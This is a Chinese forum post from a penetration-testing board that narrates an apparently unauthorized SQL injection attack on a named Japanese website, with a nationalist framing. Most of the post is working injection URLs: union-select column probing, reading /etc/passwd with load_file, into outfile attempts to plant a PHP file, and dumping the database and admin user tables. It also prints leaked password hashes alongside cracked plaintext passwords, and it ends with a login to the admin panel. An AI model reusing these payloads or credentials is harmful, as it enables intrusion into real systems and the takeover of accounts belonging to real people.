找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创 检测汉奸站全过程
返回列表 发新帖
查看: 4249|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
xiancda
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
补:www.zuaa.jp测试

8 U* c& y0 t0 Q8 v, o( ?$ G
9 s7 s. @: [/ }0x01. 检测 www.zuaa.jp 收集数据; c6 |' X- ]/ t. q
1 W. K# X  @3 U( R  U# K' E$ W
$ U2 d# o' ?; b$ J8 Y
whatweb
5 E8 t+ V  [( d; h, ^  ~4 L; A
  h  @) x% _9 [0 e/ N% x& t
3 T; a- k( g1 Y/ L- g利用NMAP扫描+ L, D- r$ s" x
8 z; `( N# A8 q' W  W& N$ G$ j' u
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持2 L( P+ k  ^  P
0x02.找注入点# L6 P4 J3 ~& v9 F" [# Q
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=3901 L$ _% Z) }4 Z  o( b6 a

7 O% L. m$ t+ A  s/ }0 D( I/ Q
0 k4 P9 A/ D1 F  ?1 V) ?0x03.order by
, {/ w1 m, R- l2 ]1 R. S. i             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 15 p: u5 P: U* Y+ b+ }% W/ x

) S7 }) Y7 U! ?) c& h" r+ porder by 28报错,order by 27正常
8 F! ?% R# {/ |2 G) l2 J2 h3 g+ S0 G0 I+ g  M
0x04.   union手动查询
7 T/ u# C, B$ _+ ~1 }6 khttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ! F, f# _1 u* L! ^# `, ?* D3 o, {( Z
添加到 27 时正常显示 8 e7 Y8 Y8 B9 J4 G; |) \
( L0 k$ C5 p  f& k- [
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
6 r+ t/ u$ p' J' D* _: X
  [+ ^- z2 r* k; p* I0x05. info:" p6 _/ q; t2 B; y9 V) T0 q$ {
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
# ?( y' K4 m( ], W2 ^
: x  p# H! y6 kuser:            root@localhost! S0 B$ T* [3 V9 Q/ t' F' N
database:    openpne
; S5 {+ j- L4 U$ k# ?9 j/ tversion:      4.1.22
* T3 c6 n% m( r1 d( Y! l  Vos:             portbld-freebsd5.4
) a' i! V( p3 O6 ~: m. O0 p
- {% L3 l/ t4 S/ k0x06. root用户
5 u2 L. e9 s. T* e7 h. D2 n5 M% l, o利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)& I/ w" V" W* P0 M2 C- r5 H9 w
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 5 x& a; O) u( f" D
6 W2 w5 m8 E; j% Y4 q- {& i* O
通过工具转换( p1 u$ r+ V2 x1 I* a# S. o7 E

; z8 W5 R: V  j+ s: }! I  s& g中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持" r' \( W- |, e& J7 U. u
, C# e4 k7 e  @1 \1 z
0x07. 利用 into outfile
& H# G5 r, d2 p- K6 J* P全部都失败
* ]+ w2 y- _7 D  ?1 dhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
8 j& D9 K7 k* j5 k: s5 s* }  `( u
) o* E2 G- G: G6 t" k. x3 D8 Ihttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php 7 ]9 i& c  T' G5 \7 Q. n. @

5 J/ Z8 J) W: I  l4 Z( ]" [页面显示“MDB2 Error:syntax error”* l! @4 h, s' p# c! B# E) g5 |7 Q0 H

- x# S8 C7 u( n( x+ E+ P0x08. 利用 mysql 4.1
' h) T$ k5 J! d5 }3 M  q猜常规表名,字段未果 工具 sqlmap$ \: U" n8 S, r4 S3 h) u, \
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持: D2 V& D! R  p

" j' L4 R2 f' ?( i, u( C, b
8 T# u, p* T( a4 o# F3 h% o& t9 _* A: D# j  O
0x09. 查找后台
) E, _4 M4 |" y; e& k2 v: N9 \7 M利用 现有的各种 后台工具尝试都不行( J5 \$ i# I$ E6 J

: x" i. [& @' x0x10.  MySL外联方法
: a6 J( Z1 O9 E3 J从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
3 G% U1 u. j0 p7 Z1 N可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
. M) c( S8 H0 T8 y8 e; ihttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user- q; i6 j% K2 n" F
3 L% _8 O( ]4 V9 }' O% M. |
这个可以在 www.cmd5.com 解密
3 g: _$ v: G8 e* J) Sroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa20093 y4 d; M- C. J3 _
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97% {) Q& A  U1 r- G: T( g; e
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
1 ]/ i( t7 E4 Z/ w9 E2 ?zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
* A5 X9 r+ ?& a2 t工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
, P8 V- |( J9 ^! o. k( f) u+ v& G) c5 t  q) u8 Z' ?' h2 Y+ f
, N1 u5 A$ ]; D
0x11. 网站突破
8 E% N: U0 Y5 v发现网站的源程序 openpne, google 下载 openpne 源码( r* q# ~% e7 f. b8 v

- E! s6 ?" P9 |" O* E% T5 z8 O' k% R' z$ z. h+ x
0x12. 默认信息利用5 ?' b3 b# f5 V4 G
http://sns.zuaa.jp/?m=admin&a=page_login
  n0 \; @" }% c# N+ C
/ _( y/ Q7 }& }5 C- [3 ^表名 (c_admin_user) ,字段名(username,password)3 T( H+ L. N! d( D& j
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
* w* s' s3 o/ \5 s( M
* Y1 P) C$ G# J8 m1 _, q解密$ H+ ^+ D4 _$ L8 j. W  T) K
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
( X4 W  v8 R/ U: D4 j# Pzuaajp:c0923ec5857796a393da99905008c176,          zju18977 a0 f0 ]" _* w. t* p  x

9 q+ L/ q/ U5 r: Z9 U) k中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持; \, ?9 m) \, y* q
0 C, Z& Q/ i$ k: F/ s
0x13. 登录后台" U6 J3 `2 m) y8 X& ]: K( c7 o7 H
7 r% F$ ]8 g" m* B3 e+ j3 I
+ L7 X5 B% i; z9 D5 i
; d/ e9 {* e, G
0x14. 小结% H: B/ I& e' Y7 l8 o
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
9 a/ q! t* W: s& N- @感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
: I2 |% n/ [( `2 D# n, \------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
! m: a" J; T+ C  P9 T6 K6 l  G中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
9 Y; R8 D: x7 l* P) z0 p$ V2 r; _  }" N# ~( o# C8 S4 D
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!- h% t; F+ S# m9 I6 d2 P

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

荒村狂客
沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表